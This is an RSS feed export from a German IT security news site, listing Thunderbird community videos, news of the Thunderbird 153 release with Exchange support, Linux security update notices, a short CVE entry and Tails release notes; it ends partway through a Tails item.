<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=thunderbird+exchangesupport%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 21:17:18 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 21:17:18 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=thunderbird+exchangesupport%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=thunderbird+exchangesupport%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[State of the Thunder 14: The 2026 Mobile Roadmap]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 28x - Views:1101 As 2025 winds down, its time to start thinking of what we want to achieve for our Android AND iOS apps next year. Alessandro walks us through the 2026 mobile roadmap, covering our urgent priorities, feature wish list, and a glimpse at our ...]]></description>
<link>https://tsecurity.de/de/3693440/video/state-of-the-thunder-14-the-2026-mobile-roadmap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693440/video/state-of-the-thunder-14-the-2026-mobile-roadmap/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:15 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 28x - Views:1101 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/TB7XcRLVxFI?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>As 2025 winds down, its time to start thinking of what we want to achieve for our Android AND iOS apps next year. Alessandro walks us through the 2026 mobile roadmap, covering our urgent priorities, feature wish list, and a glimpse at our upcoming design plans for the entire Thunderbird project.<br />
<br />
Chapters<br />
<br />
00:00 Intro<br />
01:47 Thunderbird Pro in Mobile<br />
05:49 How we build a roadmap<br />
07:40 Android initiatives<br />
12:51 Material 3 or Material You<br />
21:05 Calendar Exploration Questions<br />
31:26 Roadmap items for our community<br />
33:34 iOS initiatives<br />
<br />
Resources:<br />
Current Android Roadmap: https://github.com/orgs/thunderbird/projects/19<br />
TB Pro Announcement: https://blog.thunderbird.net/2025/04/thundermail-and-thunderbird-pro-services/<br />
Mobile Development Matrix: https://matrix.to/#/#tb-mobile-dev:mozilla.org<br />
Thunderbird for Android GitHub Issues: https://github.com/thunderbird/thunderbird-android/issues<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Community Office Hours: Exchange Email Support]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 15x - Views:697 Welcome to the last Community Office Hours of 2025! In this edition, Heather and Monica welcome Sr. Software Engineer Brendan Abolivier and Software Engineer Eleanor Dichary from the Desktop Team. We’re discussing the recent Exchange Web Su...]]></description>
<link>https://tsecurity.de/de/3693439/video/community-office-hours-exchange-email-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693439/video/community-office-hours-exchange-email-support/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:14 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 15x - Views:697 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/w986NrVHBM0?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Welcome to the last Community Office Hours of 2025! In this edition, Heather and Monica welcome Sr. Software Engineer Brendan Abolivier and Software Engineer Eleanor Dichary from the Desktop Team. We’re discussing the recent Exchange Web Support for email that just landed in Thunderbird Monthly Release 145. Learn how the team landed this feature and discover future plans for Calendar and Contact support, as well as Graph API<br />
<br />
Chapters:<br />
00:00 Intro<br />
03:50 What is Microsoft Exchange<br />
05:07 Why it took so long to add Exchange<br />
14:33 Exchange in Thunderbird 145<br />
18:20 Config options and authorization<br />
27:10 Attachments and storage<br />
32:30 Sync and folder operations<br />
36:10 Filters and notification<br />
39:10 Search<br />
40:20 Feedback and bug reporting<br />
43:00 Mobile and Graph API<br />
49:09 JMAP and future protocols<br />
55:50 Calendar and address book<br />
59:57 Roadmap and EWS deprecation<br />
62:23 Closing<br />
<br />
Resources:<br />
Exchange Mozilla Support Article: https://support.mozilla.org/en-US/kb/thunderbird-and-exchange<br />
Exchange Mozilla Wiki Post (with call for testing): https://wiki.mozilla.org/Thunderbird%3AExchange<br />
Reach out on Matrix: https://matrix.to/#/#thunderbird:mozilla.org<br />
Bugzilla (use Exchange component for reporting): https://bugzilla.mozilla.org/enter_bug.cgi?product=MailNews%20Core<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Design System Governance Committee: January 26, 2026 Meeting]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 10x - Views:142 In their first meeting, the Design System Governance Committee, composed of MZLA employees and community members, first reviews the 2026 design roadmap. Then they take a deeper dive into tokens, their role in tying together Thunderbird's ma...]]></description>
<link>https://tsecurity.de/de/3693438/video/design-system-governance-committee-january-26-2026-meeting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693438/video/design-system-governance-committee-january-26-2026-meeting/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:13 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 10x - Views:142 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/rAJrAmu-lqw?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>In their first meeting, the Design System Governance Committee, composed of MZLA employees and community members, first reviews the 2026 design roadmap. Then they take a deeper dive into tokens, their role in tying together Thunderbird&#039;s many platforms, W3 token standards, and how to document them. This work will make it easier for new design team members and contributors to jump into their work, while providing a more coherent experience from desktop to mobile and beyond.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Accessibility Standards and Compliance Committee Meeting: February 10, 2026]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 3x - Views:105 Our Accessibility Standards and Committee Meetings are now recorded and online!

In the February Accessibility Standards & Compliance meeting, the committee advances a draft Thunderbird accessibility statement for review at the next meeting ...]]></description>
<link>https://tsecurity.de/de/3693437/video/accessibility-standards-and-compliance-committee-meeting-february-10-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693437/video/accessibility-standards-and-compliance-committee-meeting-february-10-2026/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:12 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 3x - Views:105 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/BimoUyedFxc?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Our Accessibility Standards and Committee Meetings are now recorded and online!<br />
<br />
In the February Accessibility Standards &amp; Compliance meeting, the committee advances a draft Thunderbird accessibility statement for review at the next meeting and starts crafting Thunderbird’s accessibility guidelines.  The group  identifies work needed to extend guidance into the Bolt design system with a lightweight a11y definition of done for design, and development. Finally, the committee discusses adding automated accessibility checks across platforms (including a minimum “accessibility gate”), reviews proposed success metrics, and closes with an open forum for community questions.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Design System Governance Committee: 24 February 2026]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 6x - Views:160 In the February meeting, the Bolt Design System Committee aligns on initial setup and ownership for the Bolt Design System repo, began defining cross-platform icon naming conventions, plus works towards component exposure in the documentatio...]]></description>
<link>https://tsecurity.de/de/3693436/video/design-system-governance-committee-24-february-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693436/video/design-system-governance-committee-24-february-2026/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:10 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 6x - Views:160 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/1L2HisD3PeQ?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>In the February meeting, the Bolt Design System Committee aligns on initial setup and ownership for the Bolt Design System repo, began defining cross-platform icon naming conventions, plus works towards component exposure in the documentation site.<br />
<br />
Have any questions or want to join the conversation? Come find us in our Matrix room (https://matrix.to/#/#bolt-design-system:mozilla.org). New to Matrix? Find a Quick Start guide here: https://matrixdocs.github.io/docs/getting-started/quick-start<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Community Office Hours: Meet the New Support Team!]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 8x - Views:326 We've got some new faces on our growing support team! in this Community Office Hours, Heather and Monica talk to the team about the work they're doing to not only get ready for Thundermail, but improve the support experience for donors, the ...]]></description>
<link>https://tsecurity.de/de/3693435/video/community-office-hours-meet-the-new-support-team/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693435/video/community-office-hours-meet-the-new-support-team/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:09 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 8x - Views:326 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/tKg5vmSnrpM?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>We&#039;ve got some new faces on our growing support team! in this Community Office Hours, Heather and Monica talk to the team about the work they&#039;re doing to not only get ready for Thundermail, but improve the support experience for donors, the wider Thunderbird community, and our incredible support contributors. <br />
<br />
Resources for Suggesting Features:<br />
Thunderbird on Desktop and Mobile - https://connect.mozilla.org<br />
Thundermail and Thunderbird Pro - https://ideas.tb.pro<br />
<br />
Resources for Becoming a Community Support Contributor:<br />
Join the Support Crew Matrix Channel - https://matrix.to/#/#tb-support-crew:mozilla.org<br />
Learn How to Write Support Articles - https://blog.thunderbird.net/2024/07/video-learn-about-thunderbird-support-articles-and-how-to-contribute/<br />
Learn How to Help Support Forum Users - https://blog.thunderbird.net/2024/08/video-how-to-answer-thunderbird-questions-on-mozilla-support/<br />
Provide Feedback on Desktop Support Articles - https://github.com/thunderbird/knowledgebase-issues/issues<br />
Provide Feedback on Android Support Articles - https://github.com/thunderbird/android-knowledgebase-issues/issues<br />
Already a SUMO Contributor? Join the Contributor Discussion Forum - https://support.mozilla.org/forums/contributors/<br />
<br />
Resources for Getting Help with Thunderbird:<br />
Thunderbird for Android Support Channel (Matrix) - https://matrix.to/#/#tb-android:mozilla.org<br />
Thunderbird Desktop Support Channel (Matrix) - https://matrix.to/#/#thunderbird:mozilla.org<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Community Office Hours: Contributor Spotlight on Bogomil Shopov]]></title>
<description><![CDATA[Author: Mozilla Thunderbird - Bewertung: 5x - Views:231 Thunderbird's localizers make it possible for users around the world our desktop and mobile clients in their own language. This month, Heather and Monica are chatting with Bogomil Shopov, one of our Bulgarian localizers who has been with Thu...]]></description>
<link>https://tsecurity.de/de/3693434/video/community-office-hours-contributor-spotlight-on-bogomil-shopov/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693434/video/community-office-hours-contributor-spotlight-on-bogomil-shopov/</guid>
<pubDate>Sat, 25 Jul 2026 10:05:08 +0200</pubDate>
<category>🎥 Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Mozilla Thunderbird - Bewertung: 5x - Views:231 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/xSXJsPIVV60?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>Thunderbird&#039;s localizers make it possible for users around the world our desktop and mobile clients in their own language. This month, Heather and Monica are chatting with Bogomil Shopov, one of our Bulgarian localizers who has been with Thunderbird from the start. Find out how he got started in open source, how he&#039;s mentoring the next generation of contributors, and his advice on getting involved with Thunderbird (and what music he uses to focus!)<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (glibc, java-21-openjdk, kernel, and libpq), Debian (imagemagick, spice-vdagent, and webkit2gtk), Fedora (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), Mageia (apache, cifs-utils, dnsmasq, lrzip, and s...]]></description>
<link>https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 24 Jul 2026 15:13:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (glibc, java-21-openjdk, kernel, and libpq), <b>Debian</b> (imagemagick, spice-vdagent, and webkit2gtk), <b>Fedora</b> (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), <b>Mageia</b> (apache, cifs-utils, dnsmasq, lrzip, and socat), <b>Oracle</b> (.NET 10.0, .NET 9.0, 389-ds-base, cups, edk2, fence-agents, firefox, freeipmi, freerdp, git-lfs, glib2, gnutls, golang, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, hplip, libinput, libvirt, libxml2, memcached, nginx, openexr, perl-DBI, perl-XML-LibXML, php, php8.4, plexus-utils, postgresql16, python3.12, python3.14, sssd, tomcat, tomcat9, unbound, vim, xorg-x11-server-Xwayland, yggdrasil, and yggdrasil-worker-package-manager), <b>Red Hat</b> (container-tools:rhel8, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, host-metering, java-1.8.0-openjdk, java-11-openjdk with Extended Lifecycle Support, java-17-openjdk, java-21-openjdk, oci-seccomp-bpf-hook, rhc, rhc-worker-playbook, skopeo, xorg-x11-server, xorg-x11-server-Xwayland, and yggdrasil), <b>Slackware</b> (mozilla-thunderbird), <b>SUSE</b> (afterburn, alloy, apache-sshd, apache2, avahi, chromium, clamav, curl, dhcpcd, dnsmasq, docker-compose, ffmpeg-7, firefox-esr, gawk, glibc, gnutls, go1.26-openssl, google-osconfig-agent, gpg2, haproxy, ImageMagick, imagemagick, jline3, jq, kernel, libgcrypt, libgnt, meson, pidgin, nmap, nodejs24, pacemaker, patch, perl-HTML-Parser, perl-libwww-perl, perl-List-SomeUtils-XS, python-aiohttp, python-WebOb, qemu, rust-keylime, SVT-AV1, libyuv0, libaom3, trivy, ucode-intel, and wireshark), and <b>Ubuntu</b> (libhttp-date-perl, libxpm, linux-azure, linux-azure-fde, pam, and rsyslog).]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 153 esr mit Exchange-Support]]></title>
<description><![CDATA[Kleiner Nachtrag: Der E-Mail-Client Thunderbird wurde zum 22. Juli 2026 als Version 153 esr freigegeben. Der Changelog führt einige Neuerungen auf, wozu auch eine Exchange-Unterstützung per Exchange Web Services gehört. Der Thunderbird 153 esr steht für die nachfolgend genannten Betriebssysteme …...]]></description>
<link>https://tsecurity.de/de/3691305/it-nachrichten/thunderbird-153-esr-mit-exchange-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691305/it-nachrichten/thunderbird-153-esr-mit-exchange-support/</guid>
<pubDate>Fri, 24 Jul 2026 12:50:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Kleiner Nachtrag: Der E-Mail-Client Thunderbird wurde zum 22. Juli 2026 als Version 153 esr freigegeben. Der Changelog führt einige Neuerungen auf, wozu auch eine Exchange-Unterstützung per Exchange Web Services gehört. Der Thunderbird 153 esr steht für die nachfolgend genannten Betriebssysteme … <a href="https://borncity.com/blog/2026/07/24/thunderbird-153-esr-mit-exchange-support/">Weiterlesen <span class="meta-nav">→</span></a>
<p><a href="https://borncity.com/blog/2026/07/24/thunderbird-153-esr-mit-exchange-support/" rel="nofollow">Quelle</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in mozilla-thunderbird (Slackware)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3690696/unix-server/security-mehrere-probleme-in-mozilla-thunderbird-slackware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690696/unix-server/security-mehrere-probleme-in-mozilla-thunderbird-slackware/</guid>
<pubDate>Fri, 24 Jul 2026 06:31:17 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Mozilla releases Thunderbird 153 with native Microsoft Exchange support]]></title>
<description><![CDATA[Thunderbird 153 “Meadow” has been released, introducing native Microsoft Exchange support alongside a redesigned account setup experience, user interface improvements, and security fixes. The update marks the first time Exchange accounts can be configured directly in Thunderbird without relying o...]]></description>
<link>https://tsecurity.de/de/3689136/it-security-nachrichten/mozilla-releases-thunderbird-153-with-native-microsoft-exchange-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689136/it-security-nachrichten/mozilla-releases-thunderbird-153-with-native-microsoft-exchange-support/</guid>
<pubDate>Thu, 23 Jul 2026 15:14:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Thunderbird 153 “Meadow” has been released, introducing native Microsoft Exchange support alongside a redesigned account setup experience, user interface improvements, and security fixes. The update marks the first time Exchange accounts can be configured directly in Thunderbird without relying on third-party add-ons. Mozilla describes Thunderbird 153 as the culmination of the features and refinements introduced …</p>
<p>The post <a href="https://cyberinsider.com/mozilla-releases-thunderbird-1-53-with-native-microsoft-exchange-support/">Mozilla releases Thunderbird 153 with native Microsoft Exchange support</a> appeared first on <a href="https://cyberinsider.com/">CyberInsider</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 153 contains itself while Thunderbird 153 fixes almost everything]]></title>
<description><![CDATA[Mozilla walls off your online identities as MZLA unleashes a bumper repair job]]></description>
<link>https://tsecurity.de/de/3688846/it-nachrichten/firefox-153-contains-itself-while-thunderbird-153-fixes-almost-everything/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688846/it-nachrichten/firefox-153-contains-itself-while-thunderbird-153-fixes-almost-everything/</guid>
<pubDate>Thu, 23 Jul 2026 13:19:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mozilla walls off your online identities as MZLA unleashes a bumper repair job]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird: Neue ESR-Version mit Exchange-Support]]></title>
<description><![CDATA[Thunderbird 153 „Meadow“ bringt einen neuen Einrichtungsdialog, native Exchange-Anbindung per EWS und mehr Funktionen in Benachrichtigungen.]]></description>
<link>https://tsecurity.de/de/3688675/it-nachrichten/thunderbird-neue-esr-version-mit-exchange-support/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688675/it-nachrichten/thunderbird-neue-esr-version-mit-exchange-support/</guid>
<pubDate>Thu, 23 Jul 2026 12:19:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Thunderbird 153 „Meadow“ bringt einen neuen Einrichtungsdialog, native Exchange-Anbindung per EWS und mehr Funktionen in Benachrichtigungen.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-14899 | Mozilla Thunderbird up to 140.12/152 MIME Header Parsing off-by-one (Nessus ID 329091)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Mozilla Thunderbird up to 140.12/152. Affected is an unknown function of the component MIME Header Parsing. This manipulation causes off-by-one.

This vulnerability is tracked as CVE-2026-14899. The attack is possible to be carried out r...]]></description>
<link>https://tsecurity.de/de/3688440/sicherheitsluecken/cve-2026-14899-mozilla-thunderbird-up-to-14012152-mime-header-parsing-off-by-one-nessus-id-329091/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688440/sicherheitsluecken/cve-2026-14899-mozilla-thunderbird-up-to-14012152-mime-header-parsing-off-by-one-nessus-id-329091/</guid>
<pubDate>Thu, 23 Jul 2026 10:57:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 140.12/152</a>. Affected is an unknown function of the component <em>MIME Header Parsing</em>. This manipulation causes off-by-one.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2026-14899">CVE-2026-14899</a>. The attack is possible to be carried out remotely. No exploit exists.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Thunderbird 153 “Meadow” is out now!]]></title>
<description><![CDATA[As we head into the summer months, a new Extended Support Release (ESR) is in full bloom. Thunderbird 153 “Meadow” is out now, and from all of us at MZLA, the Thunderbird Council, and our global community of contributors, we can’t wait for you to try it out. “Meadow” builds on Thunderbird 140 “Ec...]]></description>
<link>https://tsecurity.de/de/3687681/tools/thunderbird-153-meadow-is-out-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687681/tools/thunderbird-153-meadow-is-out-now/</guid>
<pubDate>Wed, 22 Jul 2026 23:59:58 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>As we head into the summer months, a new Extended Support Release (ESR) is in full bloom. Thunderbird 153 “Meadow” is out now, and from all of us at MZLA, the Thunderbird Council, and our global community of contributors, we can’t wait for you to try it out. “Meadow” builds on Thunderbird 140 “Eclipse,” along […]</p>
<p>The post <a href="https://blog.thunderbird.net/2026/07/thunderbird-153-meadow-is-out-now/">Thunderbird 153 “Meadow” is out now!</a> appeared first on <a href="https://blog.thunderbird.net/">The Thunderbird Blog</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tails 7.6.1]]></title>
<description><![CDATA[This release is an emergency release to fix important security
vulnerabilities in Tor Browser.

Changes and updates



Update Tor Browser to
15.0.9, which
fixes several vulnerabilities in Firefox
140.9.0.



We are not aware of these vulnerabilities being exploited in practice.



Update the Tor ...]]></description>
<link>https://tsecurity.de/de/3687675/it-security-tools/tails-761/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687675/it-security-tools/tails-761/</guid>
<pubDate>Wed, 22 Jul 2026 23:53:43 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This release is an emergency release to fix important security
vulnerabilities in <em>Tor Browser</em>.</p>

<h1>Changes and updates</h1>


<ul>
<li><p>Update <em>Tor Browser</em> to
<a href="https://blog.torproject.org/new-release-tor-browser-1509">15.0.9</a>, which
fixes <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-27/">several vulnerabilities in <em>Firefox</em>
140.9.0</a>.</p>

<div class="attack">

<p>We are not aware of these vulnerabilities being exploited in practice.</p>

</div>
</li>
<li><p>Update the <em>Tor</em> client to 0.4.9.6.</p></li>
<li><p>Update <em>Thunderbird</em> to <a href="https://www.thunderbird.net/en-US/thunderbird/140.9.0esr/releasenotes/">140.9.0</a>.</p></li>
<li><p>Update some firmware packages. This improves support for newer hardware:
graphics, Wi-Fi, and so on.</p></li>
</ul>


<p>For more details, read our <a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.</p>

<h1>Get Tails 7.6.1</h1>


<h2>To upgrade your Tails USB stick and keep your Persistent Storage</h2>

<ul>
<li><p>Automatic upgrades are available from Tails 7.0 or later to 7.6.1.</p></li>
<li><p>If you cannot do an automatic upgrade or if Tails fails to start after an
automatic upgrade, please try to do a <a href="https://tails.net/doc/upgrade/index.en.html#manual">manual upgrade</a>.</p></li>
</ul>


<h2>To install Tails 7.6.1 on a new USB stick</h2>

<p>Follow our installation instructions:</p>

<ul>
<li><p><a href="https://tails.net/install/windows/index.en.html">Install from Windows</a></p></li>
<li><p><a href="https://tails.net/install/mac/index.en.html">Install from macOS</a></p></li>
<li><p><a href="https://tails.net/install/linux/index.en.html">Install from Linux</a></p></li>
<li><p><a href="https://tails.net/install/expert/index.en.html">Install from Debian or Ubuntu using the command line and GnuPG</a></p></li>
</ul>


<div class="caution"><p>The Persistent Storage on the USB stick will be lost if
you install instead of upgrading.</p></div>


<h2>To download only</h2>

<p>If you don't need installation or upgrade instructions, you can download
Tails 7.6.1 directly:</p>

<ul>
<li><p><a href="https://tails.net/install/download/index.en.html">For USB sticks (USB image)</a></p></li>
<li><p><a href="https://tails.net/install/download-iso/index.en.html">For DVDs and virtual machines (ISO image)</a></p></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tails 7.7]]></title>
<description><![CDATA[New feature


Detection of outdated Secure Boot certificates

Since 2023, Microsoft has started
replacing
the Secure Boot certificates originally issued in 2011. These older certificates
begin expiring in June 2026.

Tails now notifies you if the computer that you are using has outdated Secure
Bo...]]></description>
<link>https://tsecurity.de/de/3687673/it-security-tools/tails-77/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687673/it-security-tools/tails-77/</guid>
<pubDate>Wed, 22 Jul 2026 23:53:41 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h1>New feature</h1>


<h2>Detection of outdated Secure Boot certificates</h2>

<p>Since 2023, <a href="https://support.microsoft.com/en-us/topic/windows-secure-boot-certificate-expiration-and-ca-updates-7ff40d33-95dc-4c3c-8725-a9b95457578e">Microsoft has started
replacing</a>
the Secure Boot certificates originally issued in 2011. These older certificates
begin expiring in June 2026.</p>

<p>Tails now notifies you if the computer that you are using <a href="https://tails.net/support/known_issues/secure_boot_certificates/index.en.html">has outdated Secure
Boot certificates and needs an
update</a>.</p>

<p><a href="https://tails.net/support/known_issues/secure_boot_certificates/secure_boot_update_needed.png"><img alt="Notification: Secure Boot Update Needed" class="screenshot" height="247" src="https://tails.net/support/known_issues/secure_boot_certificates/secure_boot_update_needed.png" width="585"></a></p>

<h1>Changes and updates</h1>


<ul>
<li><p>Update <em>Tor Browser</em> to <a href="https://blog.torproject.org/new-release-tor-browser-15010/">15.0.10</a>.</p></li>
<li><p>Update <em>Thunderbird</em> to <a href="https://www.thunderbird.net/en-US/thunderbird/140.9.1esr/releasenotes/">140.9.1</a>.</p></li>
</ul>


<h1>Fixed problems</h1>


<ul>
<li>Make the <em>/root</em> folder only readable by the <code>root</code> user. (<a href="https://gitlab.tails.boum.org/tails/tails/-/work_items/21514">#21514</a>)</li>
</ul>


<p>For more details, read our <a href="https://gitlab.tails.boum.org/tails/tails/-/blob/master/debian/changelog">changelog</a>.</p>

<h1>Get Tails 7.7</h1>


<h2>To upgrade your Tails USB stick and keep your Persistent Storage</h2>

<ul>
<li><p>Automatic upgrades are available from Tails 7.0 or later to 7.7.</p></li>
<li><p>If you cannot do an automatic upgrade or if Tails fails to start after an
automatic upgrade, please try to do a <a href="https://tails.net/doc/upgrade/index.en.html#manual">manual upgrade</a>.</p></li>
</ul>


<h2>To install Tails 7.7 on a new USB stick</h2>

<p>Follow our <a href="https://tails.net/install/index.en.html">installation instructions</a>.</p>

<div class="caution"><p>The Persistent Storage on the USB stick will be lost if
you install instead of upgrading.</p></div>


<h2>To download only</h2>

<p>If you don't need installation or upgrade instructions, you can download
Tails 7.7 directly:</p>

<ul>
<li><p><a href="https://tails.net/install/download/index.en.html">For USB sticks (USB image)</a></p></li>
<li><p><a href="https://tails.net/install/download-iso/index.en.html">For DVDs and virtual machines (ISO image)</a></p></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tails 7.7.1]]></title>
<description><![CDATA[This release is an emergency release to fix important security
vulnerabilities in Tor Browser.

Changes and updates



Update Tor Browser to
15.0.11, which
fixes several vulnerabilities in Firefox
140.10.1.



We are not aware of these vulnerabilities being exploited in practice until now.



Upd...]]></description>
<link>https://tsecurity.de/de/3687672/it-security-tools/tails-771/</link>
